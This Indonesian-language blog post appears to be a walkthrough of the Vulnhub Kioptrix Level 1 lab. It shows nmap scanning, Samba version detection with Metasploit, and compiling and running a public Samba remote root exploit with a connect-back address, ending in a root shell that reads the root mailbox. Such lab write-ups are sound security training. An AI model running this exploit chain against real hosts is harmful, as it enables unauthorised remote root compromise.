Open in app

Sign in

Write

Sign in

Vulnhub Kioptrix 1 samba (Bahasa)

imam rahman
5 min readJun 25, 2018

--

Pada postingan kali ini akan membahas mengenai penyelesaian kioptrix 1 berdasarkan celah keamanan pada samba. Pada host attacker menggunakan OS Kali Linux yang dijalankan pada aplikasi Virtualbox dengan network adapter 1 (eth0) attached to bridged adapter. Sedangkan pada host target menggunakan OS Kioptrix versi 1 yang dijalankan pada aplikasi VMWare dengan netwok adapter 1 (eth0) attached to bridged adapter.

Dari segi attacker, jalankan perintah ifconfig eth0 pada terminal untuk mengetahui informasi IP host attacker pada network adapter eth0.

mr@kali:~$ ifconfig eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.11  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::a00:27ff:fec5:d1c  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:c5:0d:1c  txqueuelen 1000  (Ethernet)
        RX packets 287457  bytes 19972637 (19.0 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 320029  bytes 35413470 (33.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Berdasarkan informasi dari perintah ifconfig, diketahui alamat IP dari attacker pada eth0 ialah 192.168.1.11 dengan netmask 255.255.255.0 (/24). Langkah selanjutnya ialah kita akan mencari informasi alamat IP dari Target. Terdapat beberapa tools yang dapat digunakan diantaranya ialah nmap dan netdiscover. Pada kesempatan kali ini kita menggunakan tool nmap. Dari segi attacker, jalankan perintah nmap -e eth0 -sn 192.168.1.0/24 untuk melakukan host discovery dengan methodology ping scan pada network card eth0 di alamat jaringan 192.168.1.0 netmask /24.

mr@kali:~$ nmap -e eth0 -sn 192.168.1.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-18 04:13 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0055s latency).
Nmap scan report for 192.168.1.11
Host is up (0.0040s latency).
Nmap scan report for 192.168.1.13
Host is up (0.00041s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 11.51 seconds

Berdasarkan hasil ping scan yang telah dilakukan diketahui bahwa IP dari host target ialah 192.168.1.13. Langkah selanjutnya setelah mengetahui alamat IP dari host target ialah melakukan service enumeration terhadap target. Dengan mengetahui service, versi dan port apa yang sedang berjalan pada host target dapat digunakan untuk melakukan eksploitasi terhadap host target.

Untuk melakukan scanning dapat menggunakan tools nmap. Dari segi attacker, jalankan perintah sudo nmap -sU -A -n — top-ports 200 -oN kioptrix1_nmap_udp.txt 192.168.1.13 untuk menjalankan teknik UDP Scan terhadap alamat ip 192.168.1.13 (Target).

mr@kali:~$ sudo nmap -sU -A -n --top-ports 200 -oN kioptrix1_nmap_udp.txt 192.168.1.13
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-18 04:21 EDT
Nmap scan report for 192.168.1.13
Host is up (0.00088s latency).
Not shown: 196 closed ports
PORT     STATE         SERVICE     VERSION
111/udp  open          rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
137/udp  open          netbios-ns  Samba nmbd netbios-ns (workgroup: MYGROUP)
138/udp  open|filtered netbios-dgm
1024/udp open          status      1 (RPC #100024)
MAC Address: 94:53:30:CB:88:5D (Hon Hai Precision Ind.)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Service Info: Host: KIOPTRIX
Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
TRACEROUTE
HOP RTT     ADDRESS
1   0.88 ms 192.168.1.13
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 315.13 seconds

Dapat dilihat service smb dengan port 137 running pada kioptrix 1. Ada baiknya kita coba terlebih dahulu melakukan pengecekan versi samba dengan modul auxilary pada metasploit. Jalankan sintaks berikut pada terminal attacker

mr@kali:~$ msfconsole -q
msf > search smb_version
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/smb/smb_version normal SMB Version Detection
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.12
RHOSTS => 192.168.1.12
msf auxiliary(scanner/smb/smb_version) > run
[*] 192.168.1.12:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_version) >

Berdasarkan enumerate yang telah dilakukan didapati versi dari samba yang teridentifikasi yakni samba versi 2.2.0. Lakukan pencarian exploit yang memanfaatkan celah keamanan dari samba versi 2.2 dengan sintaks berikut pada terminal dari segi attacker.

mr@kali:~$ searchsploit samba 2.2
------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Samba 2.0.x/2.2 - Arbitrary File Creation | exploits/unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | exploits/osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1) | exploits/linux/remote/16321.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit) | exploits/bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation | exploits/linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit) | exploits/linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit) | exploits/osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit) | exploits/solaris_sparc/remote/16330.rb
Samba 2.2.8 - Brute Force Method Remote Command Execution | exploits/linux/remote/55.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1) | exploits/unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2) | exploits/unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3) | exploits/unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4) | exploits/unix/remote/22471.txt
Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit) | exploits/linux/remote/9936.rb
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow | exploits/unix/remote/22356.c
Samba 2.2.x - Remote Buffer Overflow | exploits/linux/remote/7.pl
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | exploits/multiple/remote/10.c
------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Berdasarkan pencarian exploit yang ada, terdapat remote code exceution yang dapat digunakan dimana memanfaatkan celah dari samba versi 2.2.8. untuk itu copy terlebih dahulu exploit tersebut pada direktori home user.

mr@kali:~$ cp /usr/share/exploitdb/exploits/multiple/remote/10.c /home/mr/

lakukan compile terhadap file exploit tersebut

mr@kali:~$ sudo gcc -o kioptrix1 10.c

Akan kita coba jalankan exploit untuk mengetahui opsi yang bisa digunakan

mr@kali:~$ ./kioptrix1
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./kioptrix1 [-bBcCdfprsStv] [host]
-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step> bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay> bruteforce/scanmode delay in micro seconds (default = 100000)
-f force
-p <port> port to attack (default = 139)
-r <ret> return address
-s scan mode (random)
-S <network> scan mode
-t <type> presets (0 for a list)
-v verbose mode

berdasarkan informasi opsi yang muncul, jalankan sintaks berikut pada terminal dari segi attacker.

mr@kali:~$ ./kioptrix1 -c 192.168.1.11 -b 0 192.168.1.13
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
/* note whoami, id, dan cat /var/mail/root diketik manual */
whoami 
root
id 
uid=0(root) gid=0(root) groups=99(nobody)
cat /var/mail/root 
From root Sat Sep 26 11:42:10 2009
Return-Path: <root@kioptix.level1>
Received: (from root@localhost)
by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O
If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

Selamat kioptrix level 1 berhasil di root~

Hacking
Vulnhub
Kioptrix

--

--

imam rahman

Written by imam rahman

3 Followers

imamrahman.com

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams